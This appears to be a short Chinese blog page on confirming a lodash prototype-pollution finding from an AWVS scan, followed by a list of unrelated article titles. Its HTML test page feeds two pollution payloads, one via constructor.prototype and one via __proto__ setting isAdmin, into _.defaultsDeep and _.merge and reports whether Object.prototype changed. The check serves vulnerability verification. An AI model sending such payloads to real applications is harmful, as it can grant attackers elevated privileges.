AWVS中lodash如何验证

<!DOCTYPE html>
<html>
<head>
  <title>Lodash 原型污染测试</title>
  <!-- 加载 Lodash -->
  <!-- 这里修改src中的链接 -->
  <script src="https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js"></script>
</head>
<body>
  <script>
    // 测试代码
    const payload = '{"constructor": {"prototype": {"lodash": true}}}';
    _.defaultsDeep({}, JSON.parse(payload));

    if ({}.lodash === true) {
      alert("⚠️ 漏洞存在！\n你的 Lodash 版本存在原型污染风险 (CVE-2018-3721, CVE-2019-10744)");
    } else {
      alert("✅ 安全！\n你的 Lodash 版本已修复注入漏洞");
    }
  </script>

  <script>
    // 测试代码
    const maliciousPayload = JSON.parse('{"__proto__": {"isAdmin": true}}');
    _.merge({}, maliciousPayload);

    // 检查是否污染成功
    if ({}.isAdmin === true) {
      alert("⚠️ 漏洞存在！\nObject.prototype 已被污染，isAdmin=true");
    } else {
      alert("✅ 安全！\n未检测到原型污染");
    }
  </script>
</body>
</html>

相关文章：

UE4学习笔记 FPS游戏制作33 换子弹 动画事件

LeetCode算法题(Go语言实现)_16

【Leetcode 每日一题】2716. 最小化字符串长度

23，C++——类型转换

AI 工作流自动化：从 RPA 到智能体编排（AI 任务拆解、工作流管理）

Linux服务器部署若依ruoyi-vue

leetcode131-分割回文串

[leetcode]1749. 任意子数组和的绝对值的最大值(dp)

代理模式（Proxy Pattern）实现与对比

珠心算之学习周期

图片解释git的底层工作原理

Redis的Set集合

Reactor 事件流 vs. Spring 事件 (ApplicationEvent)

[cpp] cpp11--condition_variable(条件变量)

【ESP32】VSCode配置ESP-IDF问题及解决方法

Promise的状态和方法是什么？

OpenHarmony子系统开发 - init启动引导组件（八）

【AI编程学习之Python】第一天：Python的介绍

Python_电商erp自动拆分组合编码

Kafka中的消息是如何存储的？

软件工程面试题（九）

CXL UIO Direct P2P学习

Python 服务器部署全解析：API 调用、数据处理与展示

头歌 | Linux之用户高级管理

MYTOOL-笔记

Linux系统编程 | 线程的基本概念

安装Webpack并创建vue项目

深入理解 `git pull --rebase` 与 `--allow-unrelated-histories`：区别、原理与实战指南

中医卫气营血辨证

STM32基础教程——旋转编码器测速